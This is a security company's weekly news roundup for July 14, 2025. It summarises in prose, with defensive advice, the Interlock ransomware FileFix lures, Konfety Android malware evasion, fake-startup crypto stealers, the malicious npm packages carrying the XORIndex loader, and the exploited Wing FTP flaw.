---
title: "FileFix Ransomware Threat, Konfety Malware Evasion, Crypto Users Targeted, Cybersecurity News [July 14, 2025] | DuoCircle"
description: "FileFix Ransomware Threat, Konfety Malware Evasion, Crypto Users Targeted, Cybersecurity News [July 14."
image: "https://www.duocircle.com/images/og-default.png"
canonical: "https://www.duocircle.com/blog/announcements/cyber-security-news-update-week-30-of-2025/"
---

Quick Answer

Cybersecurity headlines for the week of July 14, 2025\. Interlock ransomware operators adopted the FileFix technique from researcher mr.d0x: victims paste a disguised PowerShell command into File Explorer's address bar, fetching a PHP RAT from trycloudflare.com that exfiltrates host data as JSON. Zimperium analyzed Konfety, an Android malware that hides inside a corrupted APK ZIP structure, falsely flags files as encrypted, and uses unsupported BZIP compression to crash analysis tools while Android still runs the app. Darktrace tracked a long-running crypto-stealing scheme using fake AI, gaming, and Web3 startup brands (BeeSync, Pollens AI, Swox) to deliver Atomic macOS Stealer (AMOS) and Windows malware via fake Cloudflare verification screens. Socket found 67 malicious npm packages dropping the XORIndex loader, tied to the North Korean Contagious Interview campaign. Attackers exploited CVE-2025-47812 in Wing FTP Server (a null-byte plus Lua injection bug, fixed in 7.4.4) within a day of disclosure.

FileFix Ransomware Threat, Konfety Malware Evasion, Crypto Users Targeted, Cybersecurity News \[July 14, 2025\]

Your browser does not support the audio element.

[ Download episode](https://media.mailhop.org/duocircle/images/2025/07/FileFix-Ransomware-Threat-Konfety-Malware-Evasion-Crypto-Users-Targeted---Cybersecurity-News-July-14-2025.mp3) 

Share 

[ ](https://www.linkedin.com/sharing/share-offsite/?url=undefined%2Fblog%2Fannouncements%2Fcyber-security-news-update-week-30-of-2025%2F "Share on LinkedIn") [ ](https://twitter.com/intent/tweet?text=FileFix%20Ransomware%20Threat%2C%20Konfety%20Malware%20Evasion%2C%20Crypto%20Users%20Targeted%2C%20Cybersecurity%20News%20%5BJuly%2014%2C%202025%5D&url=undefined%2Fblog%2Fannouncements%2Fcyber-security-news-update-week-30-of-2025%2F "Share on X/Twitter") [ ](https://www.facebook.com/sharer/sharer.php?u=undefined%2Fblog%2Fannouncements%2Fcyber-security-news-update-week-30-of-2025%2F "Share on Facebook") [ ](https://reddit.com/submit?url=undefined%2Fblog%2Fannouncements%2Fcyber-security-news-update-week-30-of-2025%2F&title=FileFix%20Ransomware%20Threat%2C%20Konfety%20Malware%20Evasion%2C%20Crypto%20Users%20Targeted%2C%20Cybersecurity%20News%20%5BJuly%2014%2C%202025%5D "Share on Reddit") [ ](mailto:?subject=FileFix%20Ransomware%20Threat%2C%20Konfety%20Malware%20Evasion%2C%20Crypto%20Users%20Targeted%2C%20Cybersecurity%20News%20%5BJuly%2014%2C%202025%5D&body=Check out this article: undefined%2Fblog%2Fannouncements%2Fcyber-security-news-update-week-30-of-2025%2F "Share via Email") 

![cybersecurity news](https://media.mailhop.org/duocircle/images/2025/07/spf-record-tester-2341.jpg) 

Attackers are getting creative again, using copy-paste tricks to drop malware, hiding [Android threats](https://www.malwarebytes.com/blog/news/2025/06/android-threats-rise-sharply-with-mobile-malware-jumping-by-151-since-start-of-year) inside broken app files, and setting up entire fake startups to [steal crypto](https://www.bbc.com/news/articles/c80k5plpx8do). Developers are being targeted through tampered npm packages, while a newly exposed Wing FTP flaw is already under active abuse. With techniques evolving fast, staying patched and alert is more important than ever. Read on to **stay a step ahead**! 

Implementing [SPF](https://autospf.com/blog/spf-guide-understanding-sender-policy-framework/), [DKIM](/resources/what-is-dkim), [DMARC](/resources/what-is-dmarc), and strong [email security](/) is also key to defending against phishing and malware threats.

## Interlock Ransomware Introduces FileFix Tactic to Distribute Malware

Hackers behind Interlock ransomware are shifting tactics, using a new trick called “**FileFix**” to quietly plant remote access [trojans (RATs)](https://blog.sekoia.io/interlock-ransomware-evolving-under-the-radar/) on victims’ systems. 

Researchers from The [DFIR Report and Proofpoint](https://thedfirreport.com/2025/07/14/kongtuke-filefix-leads-to-new-interlock-rat-variant/) have seen a rise in Interlock activity, with attackers first using the KongTuke web injector, luring victims through [fake CAPTCHA](https://www.trendmicro.com/en%5Fus/research/25/e/unmasking-fake-captcha-cases.html) checks and sneaky clipboard tricks that led users to **run PowerShell scripts** launching a Node.js-based RAT. In June, a PHP version appeared, delivered the same way. 

_However, the attackers recently switched to the FileFix method invented by security researcher mr.d0x, which helps them leverage trusted Windows features like File Explorer and HTA apps_. Instead of clicking suspicious links, victims are tricked into pasting a disguised PowerShell command, posing as a file path, into the address bar. This fetches the **PHP RAT from trycloudflare.co**m, which then runs PowerShell commands to collect network and system data, exfiltrating it as JSON. 

[![system data ](https://media.mailhop.org/duocircle/images/2025/07/spf-record-tester-4211.jpg)](https://media.mailhop.org/duocircle/images/2025/07/spf-record-tester-4211.jpg)

They have also spotted attackers probing Active Directory, hunting backups, and moving laterally via RDP. For now, it is best to be cautious about copying or pasting commands from untrusted sources and to **keep security tools updated**. 

## Android Malware ‘Konfety’ Evades Detection Using Corrupted APK Files

A fresh wave of [Konfety Android malware](https://www.humansecurity.com/learn/blog/satori-threat-intelligence-alert-konfety-spreads-evil-twin-apps-for-multiple-fraud-schemes/) has surfaced, rigged with a corrupted ZIP structure and clever tricks to slip past security scans. 

It is masquerading as **legitimate applications** that imitate familiar names on Google Play. Konfety does not deliver any real functions and bombards users with hidden ads through the CaramelAds SDK. _It then gathers details about installed apps and system settings and reroutes victims to shady sites or installs other unwanted apps_. [Zimperium’s researchers](https://zimperium.com/blog/konfety-returns-classic-mobile-threat-with-new-evasion-techniques) uncovered how the malware conceals its harmful code inside encrypted DEX files that activate only while running, letting the attackers load new malicious components whenever they choose. 

Konfety also tampers with **APK internals**; it falsely marks files as encrypted to trigger [fake password prompts](https://www.bleepingcomputer.com/news/security/use-this-ai-chatbot-prompt-to-create-a-password-exclusion-list/), and labels crucial files with unsupported BZIP compression so popular analysis tools crash or fail to read them. Android, however, quietly ignores these tricks and lets the app run, helping the malware stay hidden. 

[![malware](https://media.mailhop.org/duocircle/images/2025/07/spf-record-4211.jpg)](https://media.mailhop.org/duocircle/images/2025/07/spf-record-4211.jpg)

_Beyond that, Konfety erases its icon and adjusts its behavior depending on the victim’s location_. The best course of action against this is not downloading anything from third-party app stores and sticking to trusted sources. 

## Bogus Gaming and AI Brands Target Crypto Users with Malware

**Cryptocurrency users** are being targeted in a long-running fraud where attackers pose as fake startups to push malware that steals digital assets on both Windows and macOS. 

These scams [involve social media profiles](https://www.darktrace.com/blog/crypto-wallets-continue-to-be-drained-in-elaborate-social-media-scam) of supposed AI, gaming, and Web3 enterprises that seem authentic, complete with blogs, team pages, and whitepapers. Attackers contact victims via **social media platforms**, offering small payments for trying out new software. Victims are then sent to professional-looking websites and prompted to download an app using a registration code. Scammers often exploit people’s desire to [earn crypto](https://earnpark.com/en/), making their offers seem like low-effort opportunities to gain digital assets quickly.

**On Windows**, this triggers a [fake Cloudflare screen](https://cyberpress.org/hackers-exploit-fake-cloudflare-verification-screens/) while malware installs in the background. On macOS, a disguised installer deploys [Atomic macOS Stealer (AMOS)](https://thehackernews.com/2025/06/new-atomic-macos-stealer-campaign.html), which can grab browser data, crypto wallet contents, and documents. Some variants even log into user activity and ensure the malware starts with each login. _The campaign is still ongoing and using identities like BeeSync, Pollens AI, Swox, and others to lure users_. 

[![crypto wallet contents](https://media.mailhop.org/duocircle/images/2025/07/spf-record-check-4211.jpg)](https://media.mailhop.org/duocircle/images/2025/07/spf-record-check-4211.jpg)

Again, you should avoid downloading software from unknown sources, even if they look professional, and **be cautious of unsolicited offers** on social media or emails. 

## Threat Actors Conceal XORIndex Malware in 67 Malicious npm Packages.

Threat actors have uploaded sixty-seven malicious packages to the [Node Package Manager (npm)](https://medium.com/@jesuva/node-package-managers-cab41450c2da) to deliver a **new malware loader** named XORIndex, aiming to compromise developer systems. 

[Researchers from Socket](https://socket.dev/blog/contagious-interview-campaign-escalates-67-malicious-npm-packages) discovered these packages, which have been downloaded over 17,000 times and are linked to the **broader Contagious Interview campaign** that relies on [fake job offers](https://www.infosecurity-magazine.com/news/cybercriminals-fake-crowdstrike/) to lure developers. This operation has been [active for months](https://socket.dev/blog/north-korean-contagious-interview-campaign-drops-35-new-malicious-npm-packages), with a previous wave in April involving 35 packages carrying information stealers and backdoors. In the latest attack, the threat actors used names resembling legitimate tools, like vite-meta-plugin and postcss-preloader, to blend in. 

[![FAKE JOB OFFERS](https://media.mailhop.org/duocircle/images/2025/07/hosted-email-server-9031.jpg)](https://media.mailhop.org/duocircle/images/2025/07/hosted-email-server-9031.jpg)

_When unsuspecting developers installed any of these packages, a ‘postinstall’ script silently launched XORIndex Loader, which gathered host data and sent it to a command-and-control server on Vercel infrastructure_. The server responded by deploying backdoors, including BeaverTail and InvisibleFerret, providing control over the infected machines. 

It is best to scrutinize package names carefully, **verify publisher reputations**, and test unfamiliar code in controlled environments before deploying it. 

## Hackers Exploit Remote Code Execution Vulnerability in Wing FTP Server

Hackers wasted no time exploiting a [severe flaw in Wing FTP Server](https://nvd.nist.gov/vuln/detail/CVE-2025-47812), striking just a day after technical details of the vulnerability were published. 

Security experts [have uncovered attacks](https://www.huntress.com/blog/wing-ftp-server-remote-code-execution-cve-2025-47812-exploited-in-wild) where intruders ran reconnaissance commands and created new user accounts to maintain access. [At the center is CVE-2025-47812](https://www.rcesecurity.com/2025/06/what-the-null-wing-ftp-server-rce-cve-2025-47812/), a high-risk bug mixing a null byte issue with Lua code injection, letting unauthenticated attackers execute **system-level commands**. Wing FTP, widely used in enterprises for secure file transfers, can run Lua scripts, an ability that now turns into a weakness. 

[![attackers](https://media.mailhop.org/duocircle/images/2025/07/sender-policy-framework-4211.jpg)](https://media.mailhop.org/duocircle/images/2025/07/sender-policy-framework-4211.jpg)

Researcher Julien Ahrens revealed that unsafe handling of null-terminated strings in **C++ and poor input sanitization** in Lua allowed attackers to slip null bytes into usernames, bypassing checks and injecting [malicious code](https://www.wiz.io/academy/malicious-code) into session files. A\_longside this flaw, Ahrens reported three more-password leaks via crafted URLs (CVE-2025-27889), lack of sandboxing (CVE-2025-47811), and path disclosures through oversized cookies (CVE-2025-47813)\_. 

Although fixes landed in **version 7.4.4 in May**, [threat actors](https://thehackernews.com/2024/07/tag-100-new-threat-actor-uses-open.html) were seen sending malicious login requests and attempting to download payloads using certutil and cURL, suggesting coordinated scanning and exploitation. _Organizations should patch to 7.4.4 immediately or lock down web access and monitor servers closely to avoid compromise_.

## Topics

DKIMDMARCemail securityNewsSecurityspf 

![Brad Slavin](https://media.mailhop.org/dmarcreport/images/team/brad-slavin.jpg) 

Brad Slavin 

General Manager

General Manager at DuoCircle. Product strategy and commercial lead across the email security portfolio.

## Secure your email infrastructure

Protect, authenticate, and deliver. Contact our team to find the right solution.

[Contact Sales](/contact/) [Explore Products](/products/) 

## Related Articles

[  News 5m  Apple Pay Scam, Crypto Fraud Victims, Retirement Phishing Loss, Cybersecurity News \[April 06, 2026\]  Apr 13, 2026 ](/blog/announcements/cyber-security-news-update-week-15-of-2026/)[  News 6m  GitHub Backdoor Threat, Cartier Data Breach, Fake RubyGems Steal, Cybersecurity News \[June 02, 2025\]  Jun 9, 2025 ](/blog/announcements/cyber-security-news-update-week-24-of-2025/)[  News 6m  Malicious npm Packages, Salesloft GitHub Breach, Malvertising Commit Trick, Cybersecurity News \[September 08, 2025\]  Sep 15, 2025 ](/blog/announcements/cyber-security-news-update-week-38-of-2025/)[  News 6m  Hackers Hijack WordPress, SonicWall Backup Breach, Oracle Data Theft, Cybersecurity News \[October 06, 2025\]  Oct 13, 2025 ](/blog/announcements/cybersecurity-news-update-week-42-of-2025/)

```json
{"@context":"https://schema.org","@type":"Organization","name":"DuoCircle LLC","url":"https://www.duocircle.com","logo":{"@type":"ImageObject","url":"https://www.duocircle.com/images/duocircle-logo.png"},"description":"DuoCircle is a portfolio of specialized email products covering protection, authentication, delivery, and routing. We deliver about 90% of category-leader capability at roughly half the price, backed by experts who own the outcome. Trusted by 50,000+ organizations since 2014.","subOrganization":[{"@type":"Organization","@id":"https://www.wikidata.org/wiki/Q138898167","name":"DMARC Report","url":"https://dmarcreport.com"},{"@type":"Organization","@id":"https://www.wikidata.org/wiki/Q138897474","name":"AutoSPF","url":"https://autospf.com"},{"@type":"Organization","@id":"https://www.wikidata.org/wiki/Q138897912","name":"Phish Protection","url":"https://www.phishprotection.com"}],"sameAs":["https://www.linkedin.com/company/duocircle","https://x.com/duocirclellc","https://www.facebook.com/duocirclellc","https://www.g2.com/products/phish-protection-by-duocircle/reviews","https://github.com/duocircle","https://www.crunchbase.com/organization/duocircle-llc"],"contactPoint":{"@type":"ContactPoint","contactType":"customer support","url":"https://support.duocircle.com"},"knowsAbout":["Email Security","Email Authentication","SPF","DKIM","DMARC","Phishing Protection","Spam Filtering","SMTP Relay","Email Deliverability","Email Forwarding"]}
```

```json
{"@context":"https://schema.org","@type":"WebSite","name":"DuoCircle LLC","url":"https://www.duocircle.com","description":"DuoCircle is a portfolio of specialized email products covering protection, authentication, delivery, and routing. We deliver about 90% of category-leader capability at roughly half the price, backed by experts who own the outcome. Trusted by 50,000+ organizations since 2014.","publisher":{"@type":"Organization","name":"DuoCircle LLC","url":"https://www.duocircle.com","logo":{"@type":"ImageObject","url":"https://www.duocircle.com/images/duocircle-logo.png"},"description":"DuoCircle is a portfolio of specialized email products covering protection, authentication, delivery, and routing. We deliver about 90% of category-leader capability at roughly half the price, backed by experts who own the outcome. Trusted by 50,000+ organizations since 2014.","subOrganization":[{"@type":"Organization","@id":"https://www.wikidata.org/wiki/Q138898167","name":"DMARC Report","url":"https://dmarcreport.com"},{"@type":"Organization","@id":"https://www.wikidata.org/wiki/Q138897474","name":"AutoSPF","url":"https://autospf.com"},{"@type":"Organization","@id":"https://www.wikidata.org/wiki/Q138897912","name":"Phish Protection","url":"https://www.phishprotection.com"}]}}
```

```json
[{"@context":"https://schema.org","@type":"BlogPosting","headline":"FileFix Ransomware Threat, Konfety Malware Evasion, Crypto Users Targeted, Cybersecurity News [July 14, 2025]","description":"FileFix Ransomware Threat, Konfety Malware Evasion, Crypto Users Targeted, Cybersecurity News [July 14.","url":"https://www.duocircle.com/blog/announcements/cyber-security-news-update-week-30-of-2025/","datePublished":"2025-07-21T15:03:20.000Z","dateModified":"2025-09-23T14:05:38.000Z","dateCreated":"2025-07-21T15:03:20.000Z","author":{"@type":"Person","@id":"https://www.duocircle.com/authors/brad-slavin/#person","name":"Brad Slavin","url":"https://www.duocircle.com/authors/brad-slavin/","jobTitle":"General Manager","description":"Brad Slavin runs DuoCircle, the company behind DMARC Report, AutoSPF, Phish Protection, and Mailhop. His focus is product strategy, customer relationships, and the commercial and compliance side of email authentication (DPAs, SLAs, enterprise procurement).","image":"https://media.mailhop.org/dmarcreport/images/team/brad-slavin.jpg","knowsAbout":["Email Security Strategy","SaaS Product Management","Enterprise Compliance","Customer Success","Email Deliverability Business"],"worksFor":{"@type":"Organization","name":"DuoCircle LLC","url":"https://www.duocircle.com"},"sameAs":["https://www.linkedin.com/in/bradslavin"]},"publisher":{"@type":"Organization","name":"DuoCircle LLC","url":"https://www.duocircle.com","logo":{"@type":"ImageObject","url":"https://www.duocircle.com/images/duocircle-logo.png"},"description":"DuoCircle is a portfolio of specialized email products covering protection, authentication, delivery, and routing. We deliver about 90% of category-leader capability at roughly half the price, backed by experts who own the outcome. Trusted by 50,000+ organizations since 2014.","subOrganization":[{"@type":"Organization","@id":"https://www.wikidata.org/wiki/Q138898167","name":"DMARC Report","url":"https://dmarcreport.com"},{"@type":"Organization","@id":"https://www.wikidata.org/wiki/Q138897474","name":"AutoSPF","url":"https://autospf.com"},{"@type":"Organization","@id":"https://www.wikidata.org/wiki/Q138897912","name":"Phish Protection","url":"https://www.phishprotection.com"}]},"mainEntityOfPage":{"@type":"WebPage","@id":"https://www.duocircle.com/blog/announcements/cyber-security-news-update-week-30-of-2025/"},"articleSection":"announcements","keywords":"DKIM, DMARC, email security, News, Security, spf","wordCount":1074,"image":{"@type":"ImageObject","url":"https://media.mailhop.org/duocircle/images/2025/07/spf-record-tester-2341.jpg","caption":"cybersecurity news","width":900,"height":600},"speakable":{"@type":"SpeakableSpecification","cssSelector":[".answer-block","h1"]}},{"@context":"https://schema.org","@type":"BreadcrumbList","itemListElement":[{"@type":"ListItem","position":1,"name":"Blog","item":"https://www.duocircle.com/blog/"},{"@type":"ListItem","position":2,"name":"News"},{"@type":"ListItem","position":3,"name":"FileFix Ransomware Threat, Konfety Malware Evasion, Crypto Users Targeted, Cybersecurity News [July 14, 2025]","item":"https://www.duocircle.com/blog/announcements/cyber-security-news-update-week-30-of-2025/"}]}]
```

```json
{"@context":"https://schema.org","@type":"BreadcrumbList","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https://www.duocircle.com/"},{"@type":"ListItem","position":2,"name":"Blog","item":"https://www.duocircle.com/blog/"},{"@type":"ListItem","position":3,"name":"News","item":"https://www.duocircle.comundefined"},{"@type":"ListItem","position":4,"name":"FileFix Ransomware Threat, Konfety Malware Evasion, Crypto Users Targeted, Cybersecurity News [July 14, 2025]","item":"https://www.duocircle.com/blog/announcements/cyber-security-news-update-week-30-of-2025/"}]}
```

```json
{"@context":"https://schema.org","@type":"BlogPosting","headline":"FileFix Ransomware Threat, Konfety Malware Evasion, Crypto Users Targeted, Cybersecurity News [July 14, 2025]","description":"FileFix Ransomware Threat, Konfety Malware Evasion, Crypto Users Targeted, Cybersecurity News [July 14.","url":"https://www.duocircle.com/blog/announcements/cyber-security-news-update-week-30-of-2025/","datePublished":"2025-07-21T15:03:20.000Z","dateModified":"2025-09-23T14:05:38.000Z","dateCreated":"2025-07-21T15:03:20.000Z","author":{"@type":"Person","@id":"https://www.duocircle.com/authors/brad-slavin/#person","name":"Brad Slavin","url":"https://www.duocircle.com/authors/brad-slavin/","jobTitle":"General Manager","description":"Brad Slavin runs DuoCircle, the company behind DMARC Report, AutoSPF, Phish Protection, and Mailhop. His focus is product strategy, customer relationships, and the commercial and compliance side of email authentication (DPAs, SLAs, enterprise procurement).","image":"https://media.mailhop.org/dmarcreport/images/team/brad-slavin.jpg","knowsAbout":["Email Security Strategy","SaaS Product Management","Enterprise Compliance","Customer Success","Email Deliverability Business"],"worksFor":{"@type":"Organization","name":"DuoCircle LLC","url":"https://www.duocircle.com"},"sameAs":["https://www.linkedin.com/in/bradslavin"]},"publisher":{"@type":"Organization","name":"DuoCircle LLC","url":"https://www.duocircle.com","logo":{"@type":"ImageObject","url":"https://www.duocircle.com/images/duocircle-logo.png"},"description":"DuoCircle is a portfolio of specialized email products covering protection, authentication, delivery, and routing. We deliver about 90% of category-leader capability at roughly half the price, backed by experts who own the outcome. Trusted by 50,000+ organizations since 2014.","subOrganization":[{"@type":"Organization","@id":"https://www.wikidata.org/wiki/Q138898167","name":"DMARC Report","url":"https://dmarcreport.com"},{"@type":"Organization","@id":"https://www.wikidata.org/wiki/Q138897474","name":"AutoSPF","url":"https://autospf.com"},{"@type":"Organization","@id":"https://www.wikidata.org/wiki/Q138897912","name":"Phish Protection","url":"https://www.phishprotection.com"}]},"mainEntityOfPage":{"@type":"WebPage","@id":"https://www.duocircle.com/blog/announcements/cyber-security-news-update-week-30-of-2025/"},"articleSection":"announcements","keywords":"DKIM, DMARC, email security, News, Security, spf","wordCount":1074,"image":{"@type":"ImageObject","url":"https://media.mailhop.org/duocircle/images/2025/07/spf-record-tester-2341.jpg","caption":"cybersecurity news","width":900,"height":600},"speakable":{"@type":"SpeakableSpecification","cssSelector":[".answer-block","h1"]}}
```